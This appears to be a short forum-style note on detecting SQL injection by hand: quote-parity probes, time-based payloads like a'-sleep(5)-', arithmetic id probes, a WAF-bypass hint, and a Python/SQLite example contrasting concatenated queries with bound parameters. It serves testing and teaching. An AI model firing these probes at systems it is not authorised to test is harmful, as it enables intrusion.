Below, "error" means that an error appears or that the response shows some different behaviour
\ // some error or a different behaviour
\\ // no error
' // error
'' // no error, it is a single quote written twice
''' // error
'''' // no error
''''' // error
An odd number of quotes gives an error
An even number of quotes gives no error
The above conditions might indicate an SQLi
Further test:
a'-sleep(1)-' // delays the response by more than 1 second; observe the time delay (sometimes a big delay in the response will cause a timeout, indicating possible SQLi)
a'-sleep(5)-' // delays response by more than 5 seconds
Confirms SQLi
Similar tests can be done for double quotes "
(parameters might look like numbers)
id=10 // response: A
id=11 // response: B
id=12 // response: C
id=13-1 // response: C
id=13-2 // response: B
id=13-3 // response: A
id=5*2 // response: A (5*2=10)
Above conditions might indicate an SQLi, or might indicate that our input is being interpreted somehow
id=13-sleep(1) // delay of more than 1 second in response
id=13-sleep(5) // delay of more than 5 seconds
SQLi Confirmed
One might try sleep/**/(1) or relevant WAF bypassing payloads if a WAF is present
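
Why the quote-parity and arithmetic checks above behave as they do, as an added example that is not part of the original note: Python with an in-memory SQLite database stands in for the backend (an assumption; the table, sample rows and function names are constructed for illustration), with the concatenated query next to the bound-parameter form. SQLite has no sleep(), so the timing check is not reproduced.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data mirroring the page's id=10/11/12 -> A/B/C.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT, body TEXT)")
    db.executemany("INSERT INTO items VALUES (?, ?, ?)",
                   [(10, "a", "A"), (11, "b", "B"), (12, "c", "C")])
    return db

def _fetch(db, sql, params=()):
    # Map the outcome to what a client would observe: a body, nothing, or an error.
    try:
        row = db.execute(sql, params).fetchone()
    except sqlite3.Error:
        return "error"
    return row[0] if row else None

def by_name_concat(db, raw):
    # Vulnerable: input is pasted inside a quoted literal, so quotes change the syntax.
    return _fetch(db, "SELECT body FROM items WHERE name = '" + raw + "'")

def by_id_concat(db, raw):
    # Vulnerable: input is pasted unquoted, so the database evaluates 13-1 or 5*2.
    return _fetch(db, "SELECT body FROM items WHERE id = " + raw)

def by_name_bound(db, raw):
    # Hardened: the value is bound as data and never parsed as SQL.
    return _fetch(db, "SELECT body FROM items WHERE name = ?", (raw,))

def by_id_bound(db, raw):
    # Hardened: accept only plain digits, then bind the integer.
    if not re.fullmatch(r"[0-9]{1,18}", raw):
        return "rejected"
    return _fetch(db, "SELECT body FROM items WHERE id = ?", (int(raw),))

if __name__ == "__main__":
    db = make_db()
    for n in range(1, 6):  # a', a'', a''', ... as in the quote tests above
        probe = "a" + "'" * n
        print(repr(probe), by_name_concat(db, probe), by_name_bound(db, probe))
    for probe in ("12", "13-1", "13-3", "5*2"):
        print(probe, by_id_concat(db, probe), by_id_bound(db, probe))
```

With the concatenated queries, odd quote counts break the statement and the arithmetic is evaluated by the database; with bound parameters, the same inputs are treated as plain values or rejected.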
Comment if you have other detection ways, I might have missed some. (I'll update if I missed something)